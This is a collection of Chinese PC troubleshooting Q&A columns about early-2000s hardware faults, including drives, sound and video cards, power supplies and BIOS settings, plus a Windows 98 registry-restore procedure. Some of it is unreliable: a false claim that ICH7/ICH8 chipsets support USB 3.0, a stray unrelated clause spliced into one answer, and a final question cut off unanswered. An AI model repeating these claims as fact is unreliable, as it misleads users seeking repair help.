    1．按照上面的步骤，进入安全模式下。
    2．执行如下命令：
    cd\windows
    attrib －s －h －r system.dat
    ren system.dat system.bf
    cd\
    attrib －s －h －r system.1st　 （此文件位于启动盘的根目录下）
    copy system.1st c:\windows\system.dat　（使用system.1st　替换　system.dat）
    3．重新启动Windows，系统会要求插入Windows 98的安装盘，安装完毕后即可正常启动。


移动存储故障分析

《一键清理系统垃圾》

移动存储故障分析

    故障现象一：一台装有LS120驱动器的P4电脑（没有安装内置软驱），开机后在System Configuration列表前出现“Floppy disk fail（40）”信息。

    解决方案一：提示信息中显示出主板BIOS检查不到LS120可移动软驱的存在。这种情况发生时大多数是由于驱动器硬件故障造成的。当然，也不要过于简单地判断，要排除主板上与LS120相连接的接口是否存在问题，然后再按照检查联机、测试硬件的步骤进行排查，有很多时候是由于联机插接错误或松动脱落所致。

    故障现象二：一台笔记本电脑，想要在Windows Me下安装PCMCIA接口的移动存储卡，但试了多次都无法成功。

    解决方案二：可以先在Windows Me的安装光盘中找到Driver/Storage/Flash的活页夹；然后用鼠标右键单击文件Trueffs.inf，接着重新进行选择安装。全部完成后重新启动电脑后，相信问题便可以顺利解决。

    故障现象三：最近新购了一块蓝科火钻32MB移动内存，在Windows XP、Windows Me操作系统下，只要一插入USB接口便可以正常使用。而把其插入Windows 98操作系统的电脑上，蓝科火钻上的指示灯不亮，驱动器也没有反应。

    解决方案三：蓝科火钻属于最新一代的Flash类移动存储设备，因此其在Windows Me以后的操作系统中不需要额外的外挂驱动，硬件本身会自动调用Windows提供的标准Mass Storage协议，从而做到即插即用。而换到Windows 98以前的操作系统上时，由于Windows 98以前的操作系统没有提供这样一个通用的协议标准，因此驱动器还要额外安装相应的驱动程序。一般情况下，驱动程序都会随产品附带，如果没有可以向销售人员询问。

    故障现象四：一台MO外挂驱动器，在Windows 98下使用正常，但在Windows NT平台下只要一读取新的MO盘，就会提示“不能访问，E：/参数错误”，一格式化时就会提示“Windows NT无法完成格式化”。

    解决方案四：一般情况下，MO光盘不能正常进行格式化有三种原因。一是由于MO光驱物理损坏；二是MO光盘损坏。可以试试使用Windows NT下的磁盘管理器，对MO盘进行一下简单的处理排查。对光盘进行创建磁盘分区，对磁盘的委托分区进行立即更改，然后对磁盘进行格式化；三是MO光驱没有正常安装。从故障现象分析，MO光驱没有正常安装是出现故障的主要原因，重新检查一下数据线，问题解决。


疑难杂症综合诊治系列（二）

《一键清理系统垃圾》

疑难杂症综合诊治系列（二）

    1、声卡损坏问题

    问：单位一台电脑为联想启天2200，集成声卡，几天前突然无法播放声音，经检测发现系统中无此设备。后来安装了声卡驱动程序，还是无法发声；又重装主板驱动程序，让系统自己检测声卡，并根据要求安装声卡驱动程序，设备却还是不能用（设备名称中显示“×”标志）；在BIOS中也没有屏蔽，请问是何原因？有没有可能是硬件损坏？

    答：由于您已经使用了重装驱动程序的方法来试验过了，而在设备管理器中依旧显示为不可用设备，所以我们可以判断是由于硬件出现了问题，如果您确定安装的驱动程序都完全正确，龙哥现在判断这个问题是由于硬件损坏而造成的故障，解决的办法只有把主板送修或者再购买一块PCI接口的声卡来使用了。

    2、电视卡驱动程序问题

    问：我现有一个四五年前生产的同维内置电视卡但现在没有驱动，请告知哪里可以找到？

    答：您可以在同维的网站上找到相关型号电视卡的驱动程序，同维电视卡驱动程序的下载地址为：http://www.twsz.com/Soft/PCTV.htm，希望在这个网页里您能找到您的电视卡的驱动程序。

    3、电视卡接口问题

    问：内置电视卡后有几个接口，是和电脑的哪里连接？

    答：由于每款电视卡的设计都是不一样的，所以龙哥也没有方法能够介绍清楚。龙哥只能提示您，一般电视卡后部都有同轴电视接收接口，AUDIO IN，AUDIO OUT，S端子,VIDEO IN和VIDEO OUT这几个接口，而能够和电脑连接的也只有AUDIO OUT和VIDEO OUT接口了，通过这个接口您可以把音频和视频信号输出到声卡和显卡上进行处理。

    4、导热硅脂的疑问

    问：请问使用一般的白色硅脂和含银的硅脂效果一样吗，还有就是硅脂该涂多厚才算符合规范？因为我使用了含银的硅脂感觉没什么变化，是不是涂厚了的缘故？

    答：导热硅脂不能涂得太厚，只要能使散热器和CPU结合得没有缝隙就行了。您只需要涂一点，然后把散热器放在上面旋转一下，使硅脂变得平整（里面不能有空气）就行了，切记涂抹的厚度不要太大，太大了反而会影响散热。同时硅脂加入银后，由于含有导热量更加迅速的金属，故而导热量比一般的硅脂要强，所以普通硅脂和含银硅脂导热效果是有区别的。

    5、老主板使用GeForce4显卡

    问：我使用的是华硕P2B－F主板，前天刚买了块GeForce4 MX440 64m显卡，装在我的P2B－F上后，安装驱动后也正常，可是每次开机不超过5分钟就会死掉，我试过了多次重新安装驱动和操作系统，依旧没有办法解决，请问这是什么原因？

    答：这是由于老款的BX主板对后来的显卡存在不兼容现象造成的，这是属于硬件冲突问题，无法通过软件来解决的，唯一的解决办法就是升级主板。


疑难杂症综合诊治系列（六）

《一键清理系统垃圾》

疑难杂症综合诊治系列（六）

    1、为什么电脑自动重新启动

    问：最近我玩游戏时，机器常常自己重新启动，往往要反复好多次。请问如果是硬件故障，最可能跟哪些硬件有关？

    答：一般来说是内存条的问条，试换根内存看看，以前有些老主板比如SiS530（集成K6-2)有这样的毛病；有时是CPU过热产生的保护功能，到了一定的热度，就自动重启，当然经常自动重启与电源故障或供电质量也有关系。具体原因不太好说，请用“替换法”加以判断。

    2、问：我计算机用的主板集成了AC'97声卡，后来突然不出声了，请问该如何解决？

    答：你描述的故障现象太简单了。如果以前一直是正常的，突然不出声了，应该首先检查最近安装了什么新的软件或者硬件设备，排查冲突。另外还有一个可能性是，BIOS中声卡相关设置被禁止了。请你在BIOS中打开板载声卡(一般将On Chip Sound设置Enabled)。

    3、无法正常开机

    问：我的电脑开机的时候电源灯闪一下就断了，然后关掉电源等大概20秒钟后，再开机就正常了。为什么？

    答：这个问题主要是由于电源在开启的瞬间无法提供主板启动所需要的电流，从而导致系统无法启动。面对这种情况有一个小窍门一般可以解决：在开启系统之前，先把ATX电源完全断电，然后大约20-30秒钟之后接通电源，再等待10秒钟开启系统，往往都可以解决这类故障。

    4、问：最近我在电脑上安装Windows XP操作系统时，在安装初始阶段，电脑屏幕上突然出现了一个黑色的方块，随后系统就停止安装了，请问这是为什么造成的？

    答：解决该故障，可以在进入主板BIOS后，将“BIOS Features Setup ”中的“Virus Waring（病毒警告）”选项设置成“Disabled”然后重新启动计算机，并重新安装Windows XP故障应该解决。

    5、问：请问什么是RAMBUS转接卡，它是做什么用的？

    答：其实不是什么RAMBUS转接卡，应该只是一种连通器，用来插在空的RAMBUS内存插槽里作为连接器使用。RDRAM同一通道上的内存是串联的，插连通器就是为了使整个通道连通起来。也就是说，在你的机器上，RIMM插槽必须都插满了才能工作，没有内存就使用连通器。

    6、问：我最近买了一块80GB的硬盘，可是主板却不支持，请问如该怎么办？

    答：有很多大容量的硬盘已经超过了旧主板BIOS的支持能力。所以要在老主板上使用大硬盘，解决该问题有两种方法。1. 通过使用一些由硬盘厂商提供的软件进行分区和格式化，这在各个硬盘厂商的网站上都可以下载。2. 如果你能够下载到最新版本的主板BIOS，也可以尝试升级，也许可以正确识别硬盘。

    7、问：我的机器在一次玩游戏时突然蓝屏死机，只有重新启动计算机。但是启动的时候出现了“Drive not ready error Instert Boot Diskette in A press any key when ready……”信息，系统无法启动了，请问是硬盘坏了吗？

    答：据你所说的情况硬盘损坏的可能比较小。出现上述故障的原因主要有两点：

    1. CMOS设置有问题，很可能是你在使用中死机造成CMOS信息丢失的，所以怀疑CMOS供电不足，解决办法是更换一块新电池，

    2. 由于系统引导文件或者硬盘分区表丢失造成硬盘不能启动，这可能是由于病毒造成的。可以使用最新版本杀毒软件救治。

    问：最近计算机经常出现，刚开机进入Windows 98后就无故自动重新启动的现象，然后就进入SCANDISK自检，请问这是什么原因？

    答：计算机启动之后进入SCANDISK自检是正常现象，说明上一次计算机是在非正常状态下关闭的，当然在你的机器上造成的原因是因为系统自动重启。主要有以下几种原因：

    1. 电源插座接触不良，请从电源插头、插座、开关、电源线等各方面进行详细检查。

    2. 电源功率不够或者品质不良，请首先采用更换机箱电源进行判断。如果确实是电源问题，一定要进行更换。

    3. 硬件方面存在不稳定因素，有故障；请用排除发进行诊断，或者请专业人员维修。

    4. 病毒作怪，某些病毒的表现形势为不定期重启，可以用最新的杀毒软件进行检测。

    8、问：一台电脑在播放CD时没有声音，而播放音乐和电影时都一切正常，请问应该怎样解决？

    答：从上面描述的现象来看，应该是光驱与声卡的音频线没有连接。打开机箱正确连接就可以正常听CD了。另外，如果不想连接，可以在系统属性中光驱属性中打开“为此CD-ROM设备启用数字CD音频”。前提是必须使用Windows 2000以上的操作系统或者在Windows 98中安装Media Player8.0以上的播放器。

    9、问：我的电脑每次启动时主机都会发出很大的噪音，启动需要9~20分钟不等。在这9~20分钟内显示器为黑屏，无任何反映，并且显示器的灯也不亮，等待一会便自动启动无异常。请问应怎样解决？

    答：如果您的计算机配置相对很低，那么启动速度慢是正常的。特别是CPU主频比较低，而内存容量又低于操作系统推荐要求的时候，很容易发生这种情况。此外还有可能的就是计算机感染了病毒，请用最新的杀毒软件杀毒就可解决问题。

    另外，从您上面说的计算机启动后声音很大的情况来看，可能是硬盘发出的声音，那么也可能是硬盘工作状态已经不稳定了，请注意检查。

    10、盘片有什么差别

    问：我最近购买了刻录机，因此我想了解市面上有哪些不同种类的CD－R碟片，它们有什么差别？

    答：刻录盘片都使用有机染料作为记录层的主要材料，由于颜色的不同而相对应的盘片被分别称作金盘，蓝盘，绿盘。因此，对于CDR盘片的选择，除了注意生产厂家，颜色是否均匀，片基是否平整等外，最主要是选择盘片的颜色。绿盘和蓝盘在市场上非常普遍，成本较低，价格也很便宜。它们可以接受较广泛的激光读取范围，兼容性较好。但抗光性相对较弱，保存时间一般是30年。金盘因呈现金黄的颜色而得名，是因为制作金盘的有机染料本身是接近透明的浅黄色。这种盘片的成本和售价都要高于其他种类的盘片。制作金盘的这种有机染料有更好的抗光性，能延长存放资料的时间在100年以上。

    11、无法读光盘

    问：最近碰到一个问题，刻录机无法读取光盘，请救急！

    答：首先，检查刻录机的连接线和连接头，有时候这个问题是因为接触不良所致。接下来，也有可能是光学读/写头脏了，这时候可以用光驱专用清洁盘清一清。有时候这个问题是出自操作系统或软件，这时候你最好重新安装正确的驱动程序、刻录工具软件，甚至必要时可能要重新安装操作系统。最糟的情况则是：你的刻录机可能坏了，再买一台吧。网上，再把分组传送给目标网。


疑难杂症综合诊治系列（七）

《一键清理系统垃圾》

疑难杂症综合诊治系列（七）

    1、DVD不能读取CD－R与CD－RW

    问：我的光驱是创新6X的DVD－ROM，DVD碟与普通光碟可以读取，但几乎所有CD－R与CD－RW碟都不能读取（有时可以读取，不过经常都不能读取），但我试过有一只CD－R碟是可以读取的，请问这是怎么一回事，如何可以解决？

    答：首先可能是您的DVD由于长时间使用而激光头老化或者灰尘导致读盘能力下降，CD-R与CD-RW碟是经过刻录机将数据刻录上去的，其刻录的质量和碟片的质量也参差不齐，因此可能读盘能力不强的光驱就读不出来了，建议将光头清洗或者调整它的发射频率。

    2、显卡和游戏不兼容

    问：我的电脑刚买俩月，配置如下：操作系统：Microsoft Windows XP，处理器：AMD Athlon XP 1700＋，主板Gigabyte GA－7VAC，显卡：盈通RADEON 9100普及版，内存 金士顿DDR266 256MB，硬盘酷鱼7200．8 80G。我特别爱玩极品飞车6，可是每次不一会不是定格就是花屏，我看了龙哥您的读者热线一些内容，推测可能是显卡出了问题，不知是否是这样，请问有什么具体解决方法？

    答：出现这样的问题的确是显卡本身的问题，这是由于显卡本身设计上出现了问题，造成了显卡硬件本身与游戏产生了不兼容的现象，具体的现象就是花屏和死机。到现在为止，ATI还是没有推出解决的办法，唯一能够解决的就只有不玩这个游戏或者更换显卡。

    3、显卡BIOS版本更新

    问：我的显卡是NVIDIA Geforce2 GTS，版本为“Version5.01.2001.1240”。请问我是否该升级了，如果升级的话该采用什么版本的驱动程序，我用的是163的拨号，该到什么地方下载驱动呢？

    答：这个版本并不是您的显卡驱动程序的版本，而是显卡的公版BIOS版本。由于Nvidia在提供样品时候，都提供了一个公版的BIOS供厂家使用，所以您可以看到在开机的一刹那会有这个版本号和显卡型号的显示。一般来说，显卡的BIOS并不需要更新，除非这个BIOS有Bug才会推出新的BIOS。如果您想要更新显卡的驱动程序，您可以去www.mydrivers.com驱动之家下载最新的显卡驱动程序。

    4、什么是ICH

    问：现在的南桥芯片什么ICH2、ICH5……这ICH到底是什么意思呀？

    答：从810（E）芯片组开始，Intel对芯片组的称呼有了改变，放弃了传统的南、北桥叫法，原来北桥位置的芯片称为GMCH，即Graphics and Memory Controller Hub图形存储控制中心，而南桥的位置则为ICH芯片，即I/O Controller Hub 输入/输出控制中心。至于其后面的数字是INTEL不推出的产品，其产品的性能和支持的技术越来月多，比如ICH5支持S-ATA，而ICH4就不支持。到2005年和2006年，ICH7和ICH8将相继推出，整合宽带网络接口，PCI Express界面，支持USB 3.0及无线USB传输界面，数据传输率分别为500M/s和200M/s。

    5、我的键盘比一般键盘多出一个Sleep休眠按键，听说按下键盘上的这个Sleep键可以使电脑快速进入休眠状态，但不知道为什么我在Windows 2000中总是用不了？

    其实这个多出的按键需要你加装键盘驱动程序才能够实现，但是某些键盘即便是在Windows 2000中添加了驱动程序，还是无法使用这个功能，如果你遇到这种情况就必须对系统进行设置。

    首先依次点选“开始→设置→控制面板→电源选项”项目，在单击“电源选项”中的“休眠”标签，勾选“启用休眠支持”。然后在选择“高级”标签，将“在按下计算机电源按键时”设置为“休眠”。单击“确定”按钮，此时你再按Sleep 键就会进入休眠状态。电脑休眠后会将当前内存信息保存在硬盘上并断开电源，打开电源开关时，系统很快就会恢复到休眠前的状态。

    6、问：我在安装扫描仪时，将扫描仪与电脑连接，屏幕提示找到新硬件，让我指定驱动程序位置，然后我执行了扫描仪驱动盘中的安装程序，安装完毕后在“设备管理器”中仍然显示为未知设备，请问这是什么问题？

    答：USB接口属于即插即用的热插拔接口，当我们将扫描仪与电脑连接时，系统将会识别出新硬件，但因为系统中不包含该扫描仪的驱动文件，所以不能为扫描仪匹配相应的驱动。因此在安装扫描仪一定要按照先安装驱动程序，然后重起电脑后再连接扫描仪的顺序进行。


疑难杂症综合诊治系列（三）

《一键清理系统垃圾》

疑难杂症综合诊治系列（三）

    1.i845G主板分配显存问题

    问：由于我对显卡没有什么特别的需求，所以我就购买了一款集成显卡的i845G主板，在这块主板上我安装的是128MB的DDR内存。本来没有什么问题，但是我在系统里面看怎么内存都是120MB，请问这是怎么回事？是内存出了问题还是别的什么原因？

    答：由于i845G的主板集成显卡，而集成的显卡需要从内存中划分内存作为显存，所以128MB内存中有8MB的内存当做了显存，这就使得您在系统里查看的时候，内存只显示只有120MB内存。

    2.闪盘在Windows 98下使用问题

    问：本人有一个DELL的32MB－“Latitude”的闪盘，由于是朋友给的，所以没有DELL的驱动，一直就没有使用（因为是WIN98SE下找不到驱动），请问哪里可以下载（DELL的网站上没有），或请说明一下怎么才能在Windows 98SE下使用。

    答：由于您找不到驱动下载，而且同时Windows 98SE下不支持USB闪盘的，所以您可以使用一些万用版的闪盘驱动来试试。一般来说，只要是主控芯片相同的闪盘，驱动都几乎是一样，可以通用的。

    3.Windows 2000使用Ghost

    问：我的电脑安装的是Windows 98se操作系统，因为我格式化的是Fat32格式，所以可以用Ghost做镜像，但是好像Ghost不支持NTFS格式，所以想请教，要是装Windows 2000的话，该如何用Ghost做镜像呢？能做的话，是在Ms－DOS下还是在实DOS下好？

    答：Ghost在6.0以上的版本都是支持NTFS分区格式的，这一点您不用担心。但是DOS是不支持NTFS格式分区。所以如果您想要使用Ghost的话，建议您把Ghost文件放在一个FAT32分区中，然后在DOS下进行镜像操作即可。由于Windows 2000不支持DOS，所以您在Windows2000下使用Ghost时都需要使用Windows 98的启动盘引导系统，然后在实DOS模式下进行操作。

    4.硬件兼容性导致无法进行游戏

    问：我的电脑买了快两个月，可是玩《极品飞车6》不到20秒左右不是死机就是路面出现巨大的黑白交替三角形，我的电脑配置如下：

    处理器：AMD Athlon XP 1700＋ Thoroughbred0．13 Processor

    主板：：Gigabyte GA－7VAC

    显卡：盈通RADEON 9100 普及版

    显示器：SONY CPD－G220

    内存：KINGSTON256DDR266

    硬盘酷鱼7200．7 80G

    操作系统：Microsoft Windows XP

    请问这是什么原因，有什么解决方法？

    答：出现这样的问题是由于镭9100显卡硬件本身与《极品飞车》系列游戏不兼容造成的，到现在都还没有办法解决。如果您需要玩这个游戏，只有更换显卡才可以了。

    5.显示器高压包故障

    问：我的显示器是MAG796fd2，最近显示器开机之后就有响声，就像那种刺耳的声音，吱吱的声音，而且一直响个不停，显示器也显示不了图像， 按了开关按钮也没有用了。有的时候是在开了之后不久就会有那种响声，而且不停的响，有的时候还会自动熄掉，黑掉后没有反应！要等很久才能正常显示。有的时候是接上电源后就开始吱吱的响，而且显示器没有反应。我这里不潮湿，请问显示器发出响声是怎么回事？

    答：显示器出现响声是由于显示器内部的高压包打火造成的，也就会出现吱吱的声音。由于高压包打火，显示器不能正常工作，所以显示器会出现黑屏的现象。龙哥建议您还在保修期内赶紧去维修或者更换一台显示器，因为这个问题是由于显示器本身的质量问题造成的，和使用毫无关系，如果再拖下去的话，有可能显示器会冒烟爆炸，这样的话是相当危险的。


疑难杂症综合诊治系列（四）

《一键清理系统垃圾》

疑难杂症综合诊治系列（四）

    1、我在升级Award BIOS时出现提示“Insufficient memory （内存不足）”，请问该怎么办？

    答：首先使用系统光盘启动，查毒。如果无毒，在CMOS 的“Chipset Features”的设置里， Disable掉“Video BIOS Cacheable”。按 Esc、F10、存储退出。重启动，在出现“Windows Starting”时按Ctrl+F5，这可以不加载Drvspace.bin，省了大约108KB 的内存空间。开始升级BIOS ，重启动。重进入CMOS的“Chipset Features”的设置里， Enable“Video Bios Cacheable”。按 Esc、F10、存储退出。

    2、我的主板应该可以支持ATA/100的硬盘，而购买的硬盘和数据线也都可以支持ATA/100规格，可为什么系统中显示为ATA/33呢？

    答：首先你必须确定你的操作系统安装了主板附带光盘上的ATA/100驱动程序。此外，请进入BIOS中的IDE控制选项，通常情况下选择“Auto”就可以了，不要强制降低传输协议就可以了。另外，如果你是Intel架构的主板，并且安装了IAA驱动，那么请进入IAA程序，查看里面是否手动降低了传输协议标准。

    3、一台电脑CPU的配置是AMD雷鸟1GHz。在用了一两个月后，从自检上显示，CPU变成了750MHz的主频了。于是我从CMOS参数中把频率调了一下，重新启动后就变成了1GHz了。可是过了大概半个多月又变成了750MHz，这到底是为什么？

    答：遇到这种情况首先请检测主板CMOS电池是否有电，可以尝试更换。另外，用CPU测试软件如：“MYCPU”来检测一下你的CPU的主频，如果CPU主频测试结果的确是1GHz，那么请你再调外频为133MHz。

    4、前段时间我为计算机更换了一块新显卡，但是从那以后计算机的串口鼠标在开机后就总是无效，并无法使用。就算有时候可以用了，在用了一段时间后，系统也会出现蓝屏死机现象，请问这是什么原因造成的，该怎么办？

    答：这可能是因为显卡与串口鼠标争抢系统中断资源造成的，而且从你使用老式串口鼠标来看，估计你添加的应该是PCI显卡。显卡必须拥有一个系统中断，通常为IRQ11。在系统中IRQ首先请尝试进入BIOS中，把系统中断分配设定为自动，然后把串口中断地址更改。然后重新进入系统看看能否解决。

    倘若依然无法解决，请进入操作系统的硬件设备列表中，找到显卡的选项，右击选择属性。然后在资源中滚动窗口，查看IRQ中断是否为11。如果不是，就取消自动分配，手动指定为IRQ11。完成这项工作后，再继续查看鼠标的资源属性，同样检查系统资源中是否有冲突。可以与显卡属性两个窗口比较一下。在这里不要相信系统报告的无冲突，一定要自己目视检测，并调整到无冲突状态。然后重新启动机器。通常情况下，中断冲突就会解决。如果是内存地址冲突，也可以使用相同的方法进行排除。

    另外，串口鼠标毕竟比较陈旧了，如果你的机器支持PS/2，更换一只鼠标也是不错的选择。

    5、我的电脑在开机后，显示器没有显示，主机不能启动。有时拔下电源，过一会儿又能启动了，请问这是为何？

    答：这可能是因为你的电源品质过差造成的。因为计算机在开机的一瞬间，电源需要向主板发送一个Power Good(P.G)信号。如果交流输入电压在额定工作范围之内，且各路直流输出电压也已达到它们的最低检测电平，那么经过100ms~500ms的延时，P.G.电路发出“电源正常”的信号(P.G为高电平)，接着CPU会产生一个复位信号，执行BIOS中的自检，然后才能自行启动。当电源交流输入电压降至安全工作范围以下或+5V电压低于4.75V时，电源送出“电源故障”信号。假如没有Power Good信号，CPU就不能产生复位信号，当然也就不能正常启动了。所以这里建议你更换一个品质优良的名牌电源。

    6、我的电脑，主板采用的是i845G芯片组，每次启动时都会出现“Monitor Warning”的提示，按Esc键可以跳过，然后一切正常，并没有其他问题？

    答：现在很多P4主板都具备“环境监测”功能，这项功能中有一项就是开机时自动对电脑的各项指标进行检测，如果存在问题就会给予用户提示。在这些检测中第一项就是电压检测。当电脑的电源输出电压高于CMOS中设置的数值时，就会出现上述提示。可以考虑更换更好的电源。如果偏差不大，也可以在BIOS中屏蔽这项功能，但不推荐。

    7、计算机不定时出现死机现象，先是在运行大程序时死机，后来发展到只要进行一点点操作就会死机，请问该如何解决？

    答：从你叙述的这个循序渐进的故障表现方式来看，这个问题很有可能来自CPU风扇转速降低或不稳定造成的。大部分CPU风扇的滚珠与轴承之间会使用润滑油，随着润滑油的老化，其润滑效果就越来越差，导致滚珠与轴承之间摩擦力变大。这就会导致风扇转动时而正常，时而非常缓慢。转动缓慢时，CPU就会因散热不足而自动停机或者锁死。你可以更换一个好一些的风扇即可解决。

    8、最近安装了两个硬盘后，在电脑启动时或读写数据时经常听到“吱吱”的类似磁头复位的声音。而将硬盘单独使用时则没有这种现象，请问为什么？

    答：这种现象应该是由于电源功率不足而导致硬盘磁头连续复位造成的。建议更换一个功率更高、质量更好的电源，否则硬盘的寿命将会大打折扣，一般安装双硬盘的计算机，至少需要250W以上的大厂的电源。

    9、最近新购买了一个CPU风扇，回家安装后一切正常，可是经过几分钟的运转后，风扇却不转了，把风扇的电源线连接到电源风扇电源针脚和系统散热风扇电源针脚上也都是一样的状况，换上以前的风扇同样也无法正常使用？

    答：这可能是主板出了问题，请检查主板的输出电压是否正常，另外也可以尝试更换一个机箱电源。

    10、最近我买了一块创新的Audigy声卡，重新启动计算机时出现了黑屏死机的现象，而换回了老的声卡，却一切正常，请问这是怎么回事？

    答：从上面你描述的现象来看，你使用的主板采用的芯片组应该是威盛的，因为创新Audigy的声卡和一些采用威盛的芯片组的主板存在不兼容的问题，您可以到主板生产厂商的网站下载您主板的最新BIOS程序进行刷新，然后到威盛的网站下载最新的4合1驱动程序安装到您的操作系统中，问题应该可以解决。


疑难杂症综合诊治系列（五）

《一键清理系统垃圾》

疑难杂症综合诊治系列（五）

    1、问：为什么许多板卡在使用一段时间后，金手指处出现了许多斑点？

    答：这种情况多发生在空气湿度较大的环境，可以在机箱底部放入少量空气干燥剂，并且要保持主机的良好的通风性！使用橡皮轻轻擦拭去掉金手指上的氧化层。

    2、问：一台计算机每次开机时，会出现“Primary IDE channel no 80 conductor cable installed”的错误提示？

    答：这是因为没有采用80针的DMA66 IDE连线出现的提示。为了能够让硬盘彻底发挥性能，推荐为DMA66以上硬盘配用DMA66硬盘线缆。

    3、问：我的计算机配置的是PⅢ 1GHz 的CPU、联想QDI 815EP主板、金士顿的256MB SDRAM PC133内存、昂达GeForce4 MX 440显卡、迈拓30GB硬盘、一直能够正常使用。可最近出现一个奇怪的问题：启动计算机后，系统自检时会提示CPU可能被改变，并要求进入CMOS进行检查，键进入CMOS后，检查CPU参数后发现一切正常，但是不久就死机了，重新启动后还是这样，请问这是为什么？

    答：出现你上面所说的提示，是联想的815EP主板自带的ManageEasy功能造成的。因为它能实时监测电脑硬件系统是否正常，出现这种提示，估计应该不是CPU本身的问题，多半应该是CPU散热风扇出现了问题。可以先进入CMOS，选择PC Health Status，看一看CPU的温度参数是否正常，CPU风扇的转速是否正常，如果CPU散热风扇转速为0，则说明散热风扇损坏或风扇电源松脱。另外如果CPU的温度数值非常高，在80℃以上，则说明CPU散热风扇出现了故障。

    4、问：我新买的电脑，80GB的硬盘分了6个区，但总和还剩17.4GB的空间，请问为什么？

    答：该问题应该是你用了Windows 98启动盘上的Fdisk.exe进行分区的造成的，因为Windows 98启动盘上的Fdisk.exe不支持80GB以上硬盘的分区。您可以用Windows Me启动盘，启动计算机，然后删除原来的分区，并进行重新分区就可以了。

    5、问：最近买了条256MB内存，可我的机器却只检测出128MB，但插在其他电脑上却是256MB，请问这是怎么回事？

    答：你没有说清楚你的计算机的具体配置，所以这里只能估计一下：

    1. 你的电脑配制比较古老，主板最高只能识别128MB的内存，那么你只能更换主板了。2. 你使用的主板是Intel的一些老芯片组（如i815系列），出现了Bank（也有例外）总数限制问题。通常单面内存条每条占用一组Bank，而双面内存条则每条占用两组Bank，由于某些芯片组只能正确识别的单组物理Bank最高容量为128MB，主板只能使用它总容量的一半。请更换为两条128MB的单面内存。

    6、问：我的光驱是美达50X的。前两天突然发生故障：就是光盘放入光驱后，指示灯持续亮一段时间后熄灭，显示设备未准备好，请问该故障如何解决？

    答：导致光驱不读光盘的原因有很多，你说的这种情况很可能是你的旧光驱读盘能力下降所致，你可以打开光驱检查一下光驱里的光盘固定装置是否太脏或磨损严重。建议你先彻底将光驱清洗一下，然后再作进一步处理。

    7、问：前段时间购买了一台17英寸纯平显示器，后来在使用中发现屏幕经常有一边不直，调节了很多次都是这样，请问这该怎么办？

    答：一般来说，现在的17英寸显示器一般都提供枕型失真、梯形、平行四边形、旋转、垂边枕型失真等完整的调节功能。理论上来说可以调节各种不平、不直的情况。但用户在调节时必须注意方法，一般调节显示器的原则是：首先通过旋转功能将显示器的上下两条边调得与上下边框平行，然后再分别利用枕型失真、梯形、平行四边形、垂边枕型失真等功能调节左右两条边与边框平行。

    调节左右平行时需要掌握一些技巧，那就是调节时一定要注意对称。不要先调好一条边再调另一条，那样是行不通的，因为一般显示器的每一项调节功能都是针对对称的两边同时调节的。掌握了这一点，我想你很快就可以将显示器四边调节好，然后利用水平位置、垂直位置、水平尺寸、垂直尺寸四个调节功能将显示器四条边调节得尽量靠近显示器边框就行了。

    8、问：我的电脑是赛扬900MHz CPU、精英的主板、Kingmax 256MB SDRAM内存、IBM40GB硬盘、微星的显卡、三星显示器。安装操作系统、驱动程序一切正常。但驱动程序安装后发现显示器屏幕上有很明显的横纹。重新启动系统时显示器黑屏，将显示器、显卡换到其他电脑上使用一切正常，其他配件也没有任何毛病，请问这个故障是什么原因造成的？

    答：从你说的现象来看，你用的应该是P6ISA-Ⅱ主板和三星的750S显示器，它们搭配时有时会出现这类不兼容问题，解决方法如下：到精英的主页下载该主板最新的BIOS程序进行刷新。


疑难杂症综合诊治系列（一）

《一键清理系统垃圾》

疑难杂症综合诊治系列（一）

    1、显示器水波纹的消除

    问：最近我的显示器出现了很明显的水波纹，经过手动消磁都不能解决，所以特来请教龙哥该如何消除这个问题呢？

    答：这个原因主要可能就是由于供电不足造成的，最简单的办法就是把显示器的电源插头单独接在一个插线板上，和机箱电源插头分开。如果还不能解决问题，您就必须更换一款功率大一点的好电源了。

    2、键盘按键失效问题

    问：我有一个键盘，使用了一年多一直状态良好，但是近来键盘常常会出现一键多字的问题，比如按“U”键就会自动打出“UIOP”等字母，请问这是什么问题，该如何解决？

    答：出现这样的问题很可能是由于键盘内部电路板接触出现了故障而导致的问题。如果您的键盘还在包修期内，您可以去更换一个全新的键盘，如果过了包修期，那只有购买一个全新的键盘了。

    3、Windows 2000自动重启

    问：为什么我的Windows 2000操作系统在启动后一两分钟后就会自动重启，我感觉就像是有人按了“RESET”按键一样。但是在我装的双系统中的Windows 98下却没有发生这种情况，不知道是什么原因造成的？

    答：启动系统后出现自动重启的现象有很多问题，您可以按照以下方法来解决：

    1.突然重启是因为Windows 2000有一个程序出错系统自动重启的设置，它的位置在“控制面板”→“系统”→“高级”选项卡中，在这里有一项是系统出错，第三个选择就是自动重启，你可以将它前面的对勾去掉。

    2.由于Windows 2000对系统硬件比较敏感，如果硬盘出现了一点坏道，都会使系统重启，所以请您使用Scandisk来扫描一下您的硬盘，查看是否出现了坏道。

    4、二手Modem找不到驱动

    问：最近朋友给了我一个淘汰的Modem，型号是Longway EM－56HSF－B，为PCI接口，他送给我的时候驱动光盘已经丢失。我现在想使用这个Modem但是没有驱动程序，请问我该怎么做才能驱动这个Modem？

    答：您这款Modem的品牌为龙维ECOM，既然您现在知道了型号就可以在别人的电脑上到龙维的网站上去下载最新版本的驱动。如果您没有上网的条件，您可以按照以下的方法来驱动您的电脑：

    首先插入PCI接口的Modem后，系统会自动提示找到新硬件，您可以选择“不要检测我的调制解压器，我将从列表中选择”，单击“下一步”按钮，然后在左侧的“制造商”一栏中选择“标准调制解压器类型”，然后在右侧的“类型”中选择“标准56000 kbs V90调制解压器”或者“标准56000 kbs K56Flex调制解压器”，再单击下一步完成并选择安装的端口，完成驱动安装。

    5、为何无法安装系统

    问：我先把C盘格式化后，从光盘引导装Windows XP操作系统，但是当安装到还剩39分钟的时候，系统提示有错误发生，无法安装。我从硬盘上安装Windows 98，但是安装了一半后同样报错，说光盘不干净！怎么会出现这样的问题？

    答：通过您所描述的现象，可以判定是您的安装光盘有划痕或者在拷贝文件时丢失了部分文件而造成的。如果要确定这个问题，您可以试着使用另外的一张盘片质量较好的光盘来进行系统安装。

    6、老机器能加USB接口吗？

    问：我的电脑是1999年组装的，用的是精英M726主板，没有USB接口，但是主板说明书称“on board USB function —set this option to enable the system BIOS USB  universal serial bus  function．”。请问该主板能否加装USB接口？

